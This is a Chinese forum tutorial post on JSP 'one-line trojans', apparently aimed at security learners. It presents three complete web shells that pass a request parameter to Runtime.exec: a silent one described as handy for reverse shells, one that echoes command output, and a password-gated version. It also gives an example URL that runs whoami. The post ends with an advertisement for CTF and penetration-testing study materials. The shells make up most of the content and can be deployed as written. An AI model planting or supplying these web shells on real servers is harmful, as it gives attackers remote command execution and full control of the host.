IT评测·应用市场-qidao123.com

标题: java安全——jsp一句话木马 [打印本页]

作者: 铁佛 时间: 2024-8-22 20:52
标题: java安全——jsp一句话木马
jsp回显一句话木马

文章目次

jsp回显一句话木马
一、搭建web服务
1. * 1、创建空白maven项目，搭建本地tomcat
复制代码
- 2、引入servlet的pom依赖
二、无回显一句话
三、带回显一句话
三、有密码带回显一句话

提示：以下是本篇文章正文内容，下面案例可供参考
一、搭建web服务

1、创建空白maven项目，搭建本地tomcat

2、引入servlet的pom依赖

二、无回显一句话

<%
Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
%>

复制代码

http://localhost:8003/index.jsp?cmd=whoami
不会回显执行的效果只能在配景打印一个地点，常用来反弹shell

三、带回显一句话

代码如下（示例）：

<%
Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
// System.out.println(process);
InputStream inputStream = process.getInputStream();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = bufferedReader.readLine()) != null){
response.getWriter().println(line);
}
%>

复制代码

三、有密码带回显一句话

<%
if ("password".equals(request.getParameter("pass"))){
Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
// System.out.println(process);
InputStream inputStream = process.getInputStream();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = bufferedReader.readLine()) != null){
response.getWriter().println(line);
}
}
%>

复制代码

最后

从期间发展的角度看，网络安全的知识是学不完的，而且以后要学的会更多，同砚们要摆正心态，既然选择入门网络安全，就不能仅仅只是入门程度而已，本领越强时机才越多。
由于入门学习阶段知识点比较杂，所以我讲得比较笼统，大家如果有不懂的地方可以找我咨询，我包管知无不言言无不尽，需要相关资料也可以找我要，我的网盘里一大堆资料都在吃灰呢。
干货主要有：
①1000+CTF历届题库（主流和经典的应该都有了）
②CTF技术文档（最全中文版）
③项目源码（四五十个有趣且经典的练手项目及源码）
④ CTF大赛、web安全、渗透测试方面的视频（得当小白学习）
⑤ 网络安全学习路线图（告别不入流的学习）
⑥ CTF/渗透测试工具镜像文件大全
⑦ 2023密码学/隐身术/PWN技术手册大全
如果你对网络安全入门感兴趣，那么你需要的话可以点击这里

欢迎光临 IT评测·应用市场-qidao123.com (https://dis.qidao123.com/) Powered by Discuz! X3.4